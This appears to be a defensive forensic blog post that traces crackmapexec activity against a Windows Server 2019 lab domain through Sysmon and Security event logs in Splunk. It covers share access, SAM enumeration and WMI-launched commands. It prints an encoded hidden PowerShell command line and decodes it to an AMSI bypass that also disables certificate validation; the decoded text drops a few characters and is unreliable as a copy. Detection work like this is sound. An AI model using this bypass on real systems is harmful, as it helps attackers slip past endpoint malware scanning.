04/07/2019 11:08:41 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=3 EventType=4 Type=Information ComputerName=SECNIK-2K19.securitynik.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Network connection detected (rule: NetworkConnect) OpCode=Info RecordNumber=12826 Keywords=None Message=Network connection detected: RuleName: UtcTime: 2019-04-08 06:08:40.639 ProcessGuid: {48be9e4e-df2a-5caa-0000-0010eb030000} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: false SourceIsIpv6: false SourceIp: 10.0.0.105 SourceHostname: SECNIK-2K19.securitynik.local SourcePort: 445 SourcePortName: microsoft-ds DestinationIsIpv6: false DestinationIp: 10.0.0.100 DestinationHostname: DestinationPort: 34564 DestinationPortName:
From above, we see an example of Sysmon's reporting that a network connection was detected form the host at "10.00.0.105" communicating on source port "445" to destination IP "10.0.0.100" on port "34564".
As we look below, we see an example of the shares being accessed:
04/08/2019 06:19:50 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=43571 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x5B3EF6 Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 35710 Share Information: Share Name: \\*\SYSVOL Share Path: \??\C:\Windows\SYSVOL\sysvol Relative Target Name: LusqPJemAo Access Request Information: Access Mask: 0x110080 Accesses: DELETE SYNCHRONIZE ReadAttributes Access Check Results: DELETE: Granted by D:(A;;FA;;;BA) SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;WD) ReadAttributes: Granted by D:(A;;0x1200a9;;;WD)
Let's take a better view of these shares being accessed via an image. Here is the filter I used in Splunk to see this data:
* NOT "Files\\SplunkUniversalForwarder" NOT "0:0:0:0:0:0:0:1" NOT "127.0.0.1" NOT "fe80:0:0:0:89f9:808e:8310:538e" NOT "Resource Assignment" NOT "224.0.0.252" "10.0.0.100" | stats count by Source_Address,Source_Port,ComputerName,Account_Name,Logon_ID,Security_ID,TaskCategory,Share_Name,Share_Path,Relative_Target_Name
As we look at the user enumeration, we see the first event where the firewall allowed the connection to the host at 10.0.0.105
04/09/2019 06:08:41 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5156 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Filtering Platform Connection OpCode=Info RecordNumber=53458 Keywords=Audit Success Message=The Windows Filtering Platform has permitted a connection. Application Information: Process ID: 4 Application Name: System Network Information: Direction: Inbound Source Address: 10.0.0.100 Source Port: 36662 Destination Address: 10.0.0.105 Destination Port: 445 Protocol: 6 Filter Information: Filter Run-Time ID: 0 Layer Name: Receive/Accept Layer Run-Time ID: 44
After the firewall permit, we can see "Administrator" has logon successfully
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=53461 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 36662 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128 This event is generated when a logon session is created. It is generated on the computer that was accessed.
Next up we see the "Administrator" account with source IP address 10.0.0.100 accessing the share name "\\*\IPC$"
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5140 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=File Share OpCode=Info RecordNumber=53462 Keywords=Audit Success Message=A network share object was accessed. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 36662 Share Information: Share Name: \\*\IPC$ Share Path: Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory)
After the share has been accessed, we see below that permissions are being checked on the share
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=53463 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 36662 Share Information: Share Name: \\*\IPC$ Share Path: Relative Target Name: samr Access Request Information: Access Mask: 0x3 Accesses: ReadData (or ListDirectory) WriteData (or AddFile) Access Check Results: -
We next see a handle being requested to an object. Note this was handled by the "lsass.exe" process. From below, we can conclude the accounts on the system were being listed. The handle being requested can be either for an Active Directory object or a SAM object. Since this device is running Windows 2019, we will conclude this will be based on the Active Directory Object.
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4661 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=SAM OpCode=Info RecordNumber=53464 Keywords=Audit Success Message=A handle to an object was requested. Subject : Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Object: Object Server: Security Account Manager Object Type: SAM_DOMAIN Object Name: DC=securitynik,DC=local Handle ID: 0x2555508d260 Process Information: Process ID: 0x22c Process Name: C:\Windows\System32\lsass.exe Access Request Information: Transaction ID: {00000000-0000-0000-0000-000000000000} Accesses: DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts Access Reasons: - Access Mask: 0xF01FD Privileges Used for Access Check: - Properties: --- {19195a5a-6da0-11d0-afd3-00c04fd930c9} DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts {c7407360-20bf-11d0-a768-00aa006e0529} {bf9679a4-0de6-11d0-a285-00aa003049e2} {bf9679a5-0de6-11d0-a285-00aa003049e2} {bf9679a6-0de6-11d0-a285-00aa003049e2} {bf9679bb-0de6-11d0-a285-00aa003049e2} {bf9679c2-0de6-11d0-a285-00aa003049e2} {bf9679c3-0de6-11d0-a285-00aa003049e2} {bf967a09-0de6-11d0-a285-00aa003049e2} {bf967a0b-0de6-11d0-a285-00aa003049e2} {b8119fd0-04f6-4762-ab7a-4986c76b3f9a} {bf967a34-0de6-11d0-a285-00aa003049e2} {bf967a33-0de6-11d0-a285-00aa003049e2} {bf9679c5-0de6-11d0-a285-00aa003049e2} {bf967a61-0de6-11d0-a285-00aa003049e2} {bf967977-0de6-11d0-a285-00aa003049e2} {bf96795e-0de6-11d0-a285-00aa003049e2} {bf9679ea-0de6-11d0-a285-00aa003049e2} {ab721a52-1e2f-11d0-9819-00aa0040529b} Restricted SID Count: 0
Similarly, we see yet another request for this handle. However, this time, note it is listing the groups. Note similar to above, additional information is being retrieved. The various property set GUID represents different items.
04/09/2019 06:08:42 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4661 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=SAM OpCode=Info RecordNumber=53465 Keywords=Audit Success Message=A handle to an object was requested. Subject : Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xA8C3DC Object: Object Server: Security Account Manager Object Type: SAM_USER Object Name: S-1-5-21-4078604576-3869073289-8028338-500 Handle ID: 0x2555508e5a0 Process Information: Process ID: 0x22c Process Name: C:\Windows\System32\lsass.exe Access Request Information: Transaction ID: {00000000-0000-0000-0000-000000000000} Accesses: DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadGeneralInformation ReadPreferences WritePreferences ReadLogon ReadAccount WriteAccount SetPassword (without knowledge of old password) ListGroups Access Reasons: - Access Mask: 0xF01BF Privileges Used for Access Check: - Properties: --- {bf967aba-0de6-11d0-a285-00aa003049e2} DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadGeneralInformation ReadPreferences WritePreferences ReadLogon ReadAccount WriteAccount SetPassword (without knowledge of old password) ListGroups {59ba2f42-79a2-11d0-9020-00c04fc2d3cf} {bf967938-0de6-11d0-a285-00aa003049e2} {5fd42471-1262-11d0-a060-00aa006c33ed} {bf9679e8-0de6-11d0-a285-00aa003049e2} {bf967a00-0de6-11d0-a285-00aa003049e2} {3e0abfd0-126a-11d0-a060-00aa006c33ed} {bf967a6a-0de6-11d0-a285-00aa003049e2} {bf967953-0de6-11d0-a285-00aa003049e2} {4c164200-20c0-11d0-a768-00aa006e0529} {bf967915-0de6-11d0-a285-00aa003049e2} {bf967a0a-0de6-11d0-a285-00aa003049e2} {bf967a68-0de6-11d0-a285-00aa003049e2} {bf967a6d-0de6-11d0-a285-00aa003049e2} {5f202010-79a5-11d0-9020-00c04fc2d4cf} {bf96792e-0de6-11d0-a285-00aa003049e2} {bf967985-0de6-11d0-a285-00aa003049e2} {bf967986-0de6-11d0-a285-00aa003049e2} {bf967996-0de6-11d0-a285-00aa003049e2} {bf967997-0de6-11d0-a285-00aa003049e2} {bf9679aa-0de6-11d0-a285-00aa003049e2} {bf9679ab-0de6-11d0-a285-00aa003049e2} {bf9679ac-0de6-11d0-a285-00aa003049e2} {bf967a05-0de6-11d0-a285-00aa003049e2} {bf9679a8-0de6-11d0-a285-00aa003049e2} {e48d0154-bcf8-11d1-8702-00c04fb96050} {bf967950-0de6-11d0-a285-00aa003049e2} {bc0ac240-79a9-11d0-9020-00c04fc2d4cf} {bf967991-0de6-11d0-a285-00aa003049e2} {ab721a53-1e2f-11d0-9819-00aa0040529b} {00299570-246d-11d0-a768-00aa006e0529} {7ed84960-ad10-11d0-8a92-00aa006e0529} Restricted SID Count: 0
Let's now look at what the logs look like to see how we might be able to discover when the request was made to enumerate the password policy
04/17/2019 08:11:15 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4661 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=SAM OpCode=Info RecordNumber=150020 Keywords=Audit Success Message=A handle to an object was requested. Subject : Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x55E205 Object: Object Server: Security Account Manager Object Type: SAM_DOMAIN Object Name: DC=securitynik,DC=local Handle ID: 0x1fa0565e940 Process Information: Process ID: 0x234 Process Name: C:\Windows\System32\lsass.exe Access Request Information: Transaction ID: {00000000-0000-0000-0000-000000000000} Accesses: DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts Access Reasons: - Access Mask: 0xF01FD Privileges Used for Access Check: - Properties: --- {19195a5a-6da0-11d0-afd3-00c04fd930c9} DELETE READ_CONTROL WRITE_DAC WRITE_OWNER ReadPasswordParameters ReadOtherParameters WriteOtherParameters CreateUser CreateGlobalGroup CreateLocalGroup GetLocalGroupMembership ListAccounts {c7407360-20bf-11d0-a768-00aa006e0529} {bf9679a4-0de6-11d0-a285-00aa003049e2} {bf9679a5-0de6-11d0-a285-00aa003049e2} {bf9679a6-0de6-11d0-a285-00aa003049e2} {bf9679bb-0de6-11d0-a285-00aa003049e2} {bf9679c2-0de6-11d0-a285-00aa003049e2} {bf9679c3-0de6-11d0-a285-00aa003049e2} {bf967a09-0de6-11d0-a285-00aa003049e2} {bf967a0b-0de6-11d0-a285-00aa003049e2} {b8119fd0-04f6-4762-ab7a-4986c76b3f9a} {bf967a34-0de6-11d0-a285-00aa003049e2} {bf967a33-0de6-11d0-a285-00aa003049e2} {bf9679c5-0de6-11d0-a285-00aa003049e2} {bf967a61-0de6-11d0-a285-00aa003049e2} {bf967977-0de6-11d0-a285-00aa003049e2} {bf96795e-0de6-11d0-a285-00aa003049e2} {bf9679ea-0de6-11d0-a285-00aa003049e2} {ab721a52-1e2f-11d0-9819-00aa0040529b} Restricted SID Count: 0
The above is reflective of the password policy being requested (along with other domain parameters). See the reference section for their link to translate the values.
Let's now see what the communication looks like when crackmapexec runs a powershell command.
To help us understand the connections which are created, let's take a look at some statistics via Splunk. Specifically, along with some important information, let's identify the different logon sessions. We can track these via the "Logon_ID" field as shown below.
* NOT("splunk" OR "activedirectory.webservices.exe" OR "::1" OR "127.0.0.1" OR Protocol=17) | stats count by Source_Address,Source_Port,Logon_ID,Account_Name,Share_Name Source_Address Source_Port Logon_ID Account_Name Share_Name count 10.0.0.100 53494 0xB48A3E Administrator \\*\C$ 21 10.0.0.100 53496 0xB48A64 Administrator \\*\IPC$ 2 fe80::89f9:808e:8310:538e 56096 0xB4D870 SECNIK-2K19$ \\*\SYSVOL 2 fe80::89f9:808e:8310:538e 56100 0xB5543B SECNIK-2K19$ \\*\SYSVOL 3 fe80::89f9:808e:8310:538e 56103 0x3E4 SECNIK-2K19$ \\*\IPC$ 1
From the information above, it looks like the first session is the busiest. Let's look into that session to see what we can figure out.
Using a filter which focuses in on Logon_ID "0xB48A3E", we see the following:
04/18/2019 01:32:43 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=172526 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 53494 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128
Above we see user "Administrator" logon successfully from "10.0.0.100:53494" and was assigned the logon ID of "0xB48A3E".
We then see below that the share name "\\*\C$" was accessed via a read (or list directory) action.
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5140 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=File Share OpCode=Info RecordNumber=172553 Keywords=Audit Success Message=A network share object was accessed. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory)
Next up we see the below the object "Windows\Temp\kJpSGP" was checked to see if ReadData access can be granted to the target "Windows\Temp\kJpSGP"
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172554 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Relative Target Name: Windows\Temp\kJpSGP Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory) Access Check Results:
Next up below, we see yet another attempt to check whether access can be granted. This time to "Windows\Temp\kJpSGP"
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172568 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Relative Target Name: Windows\Temp\kJpSGP Access Request Information: Access Mask: 0x1 Accesses: ReadData (or ListDirectory) Access Check Results:
Following the event above, we see below that a check was done to see if the necessary permissions exists to delete the file above.
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172570 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Network Information: Object Type: File Source Address: 10.0.0.100 Source Port: 53494 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Relative Target Name: Windows\Temp\kJpSGP Access Request Information: Access Mask: 0x10080 Accesses: DELETE ReadAttributes Access Check Results:
Similar to above, there were a number of these checks to see if the necessary permissions were in place. However, in the interest of space and time I choose to leave them out of this analysis.
Ultimately, this account logged off as shown below.
04/18/2019 01:32:47 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4634 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logoff OpCode=Info RecordNumber=172610 Keywords=Audit Success Message=An account was logged off. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A3E Logon Type: 3
Let's now see what is going on with the logon ID "0xB48A64" which is associated with IP 10.0.0.100.
04/18/2019 01:32:43 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=172530 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A64 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 53496 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128
Above we see the logon which is ultimately followed by a logoff as shown below.
04/18/2019 01:32:47 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4634 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logoff OpCode=Info RecordNumber=172609 Keywords=Audit Success Message=An account was logged off. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48A64 Logon Type: 3
At this point my conclusion was that we missed something in our analysis. This has to be because of our initial filter. While that filter helped us to detect some activity, it did not help us to find where the actual powershell command was executed. Let's step back for a second and look between the logon and logoff time above to see if we can get better insights into what might have transpired during that time.
As I scroll through the logs, I noticed a logon ID which was not caught by my previous filter. This new Logon ID is "0xB48AC1". You may also notice that the port "10.0.0.100:37794" was not in our filter above. Maybe we missed something. Hopefully my oversight above helps you to understand how easy it is to miss important evidence.
Below we see that account was able to successfully logon
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4624 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logon OpCode=Info RecordNumber=172543 Keywords=Audit Success Message=An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x0 Process Name: - Network Information: Workstation Name: - Source Network Address: 10.0.0.100 Source Port: 37794 Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V2 Key Length: 128
Now that we have this new Logon ID of "0xB48AC1", we can set a filter to focus on the activity performed by this Logon ID. Let's push ahead to see what we can find of relevance.
Immediately after logon, we see below the "Administrator" account using Logon ID "0xB48AC1" creating a new process for "cmd.exe". As we look at the "Process Command Line" below we see interestingly that the file "Windows\Temp\kJpSGP" which we referenced above and for which permissions checks were being done is being used. I find this command line interesting, so let's break it down.
Basically below, arguments to "cmd.exe" are as follows:
/Q - Turns echo off
/c - Carries out the command specified by string and then terminates
cd \ - says to switch to the root directory in this case C:\ more than likely
1> - take anything from the output of the previous command and send it to ....
... \\127.0.0.1\C$\Windows\Temp\kJpSGP - The file to which the contents of the redirection should be sent if anything
2>&1 - Take any error which may occur and send it to where standard out is going which is to the file "kJpSGP"
Now that we know what the command is about, let's press ahead.
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=172550 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Process Information: New Process ID: 0xe00 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x12cc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1
We then see the "cmd.exe" process above, now creates below the "conhost.exe" process.
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=172551 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1040 New Process Name: C:\Windows\System32\conhost.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xe00 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
We next see below on the localhost (127.0.0.1), some activity being performed by the logon ID "0xB48AC1". Specifically we see attempts to check to see whether or not there is enough permission to "The right to read the information in the object's security description", "The right to use the object for synchronization", "the right to write data to the file", "the right to append data to the file", "The right to write extended file attributes", "The right to read file attributes" and finally "The right to write file attributes."
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172566 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Network Information: Object Type: File Source Address: 127.0.0.1 Source Port: 56094 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Relative Target Name: Windows\Temp\kJpSGP Access Request Information: Access Mask: 0x120196 Accesses: READ_CONTROL SYNCHRONIZE WriteData (or AddFile) AppendData (or AddSubdirectory or CreatePipeInstance) WriteEA ReadAttributes WriteAttributes Access Check Results:
Eventually, after seeing some additional activity (which I've excluded for brevity), we see a powershell script being executed by the "cmd.exe" process. Please note, this is not the same "cmd.exe" from above, but this activity is all related. It is just that another "cmd.exe" was created and I did not see the point with going back to show information which was already shown above. If you have any concerns about this, do feel free to drop me a line.
As we look at the command line below, we see what seems to be powershell being executed. However, we are unable to read the contents at this time.
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=172584 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Process Information: New Process ID: 0xa74 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x12cc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1
The above command line is nothing to worry about at this time. This is base64 encoded and thus can be decoded relatively easily. To do this, let's copy the following string into a text file.
WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA==
In my case I named the text file "securityNik-b64.encoded". Now that I have this file, I will leverage "certutil.exe" on my Windows 10 analysis machine, to decode this text.
c:\Users\Security Nik>certutil -decode -f c:\tmp\securityNik-b64.encoded c:\tmp\securityNik-b64.decoded Input Length = 632 Output Length = 472 CertUtil: -decode command completed successfully. c:\Users\Security Nik>type c:\tmp\securityNik-b64.decoded [ N e t . S e r v i c e P o i n t M a n a g e r ] : : S e r v e r C e r t i f i c a t V a l i d a t i o n C a l l b a c k = { $ t r u e } ; t r y { [ R e f ] . A s s e m b l y . G e t T y p e ( ' S y s t e m . M a n a g e m e n t . A u t o m a t i o n . A m s i U t i l s ' ) . G e t F i e l d ( ' a m s i I n i t F a i e d ' , ' N o n P u b l i c , S t a t i c ' ) . S e t V a l u e ( $ n u l l , $ t u e ) } c a t c h { } g e t - p r o c e s s
